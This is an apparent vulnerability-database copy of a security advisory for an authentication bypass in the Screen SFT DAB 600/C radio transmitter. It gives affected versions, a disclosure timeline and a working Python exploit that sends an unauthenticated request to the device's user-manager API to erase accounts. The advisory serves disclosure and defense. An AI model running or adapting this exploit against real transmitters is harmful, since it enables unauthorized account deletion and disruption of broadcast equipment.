Lucene search

Gjoko KrsticZSL-2023-5773

HistoryMay 13, 2023 - 12:00 a.m.

Screen SFT DAB 600/C Authentication Bypass Erase Account Exploit

2023-05-1300:00:00

Gjoko Krstic

zeroscience.mk

146

screen

dab transmitter

radio

authentication bypass

weak session management

privilege escalation

security bypass

dos

vulnerability

exploit

db elettronica telecomunicazioni spa

firmware

bios

gui

fpga

keil-eweb

montavista linux

vulnerability discovered

vendor contacted

public security advisory

gjoko krstic

zero science lab

packet storm security

7.2 High

AI Score

Confidence

Low

JSON

Title: Screen SFT DAB 600/C Authentication Bypass Erase Account Exploit
Advisory ID: ZSL-2023-5773
Type: Local/Remote
Impact: Privilege Escalation, Security Bypass, DoS
Risk: (4/5)
Release Date: 13.05.2023

Summary

Screen’s new radio DAB Transmitter is reaching the highest technology level in both Digital Signal Processing and RF domain. SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the digital adaptive precorrection and configuatio flexibility, the Hot Swap System technology, the compactness and the smart system design, the SFT DAB are advanced transmitters. They support standards DAB, DAB+ and T-DMB and are compatible with major headend brands.

Description

The application suffers from a weak session management that can allow an attacker on the same network to bypass these controls by reusing the same IP address assigned to the victim user (NAT) and exploit crucial operations on the device itself. By abusing the IP address property that is binded to the Session ID, one needs to await for such an established session and issue unauthorized requests to the vulnerable API to manage and/or manipulate the affected transmitter.

Vendor

DB Elettronica Telecomunicazioni SpA - <https://www.screen.it> | <https://www.dbbroadcast.com>

Affected Version

Firmware: 1.9.3
Bios firmware: 7.1 (Apr 19 2021)
Gui: 2.46
FPGA: 169.55
uc: 6.15

Tested On

Keil-EWEB/2.1
MontaVista® Linux® Carrier Grade eXpress (CGX)

Vendor Status

[19.03.2023] Vulnerability discovered.
[20.03.2023] Vendor contacted.
[12.05.2023] No response from the vendor.
[13.05.2023] Public security advisory released.

PoC

screen_eraseusr.py

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php>
[2] <https://www.exploit-db.com/exploits/51457>
[3] <https://packetstormsecurity.com/files/172328/>

Changelog

[13.05.2023] - Initial release
[12.10.2023] - Added reference [2] and [3]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>#!/usr/bin/env python3
#
#
# Screen SFT DAB 600/C Authentication Bypass Erase Account Exploit
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is binded to the Session ID, one needs to await for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5773
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php
#
#
# 19.03.2023
#

import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
    '''
██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████  
██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██ 
██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████  
██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██ 
██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██ 
    '''
    +Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
    '''
            ZSL and the Producers insist that no one
           submit any exploits of themselfs or others
              performing any dangerous activities.
                 We will not open or view them.
    '''
    +Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
u=input('Enter desired username: ')
e='/system/api/userManager.cgx'
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::removeUser')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
    'Accept':'application/json, text/plain, */*',
    'Accept-Language':'ku-MK,en;q=0.9',
    'Accept-Encoding':'gzip, deflate',
    'User-Agent':'Dabber-',
    'Connection':'close'}
j={'ssbtIdx':0,
   'ssbtType':'userManager',
   'ssbtObj':{
             'removeUser':u
             }
   }
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
    print('Done.')
else:
    print('Error')
exit(-3)
</p></body></html>

7.2 High

AI Score

Confidence

Low

JSON